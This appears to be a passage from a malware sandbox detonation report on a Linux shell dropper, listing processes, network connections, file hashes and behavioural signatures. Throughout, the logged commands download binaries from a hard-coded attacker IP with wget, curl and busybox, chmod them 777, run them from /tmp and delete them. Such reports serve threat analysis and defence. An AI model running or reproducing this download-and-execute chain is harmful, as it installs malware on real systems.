[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:30

Reported

2024-10-25 01:33

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

8s

Max time network

129s

Command Line

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A

Processes

/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

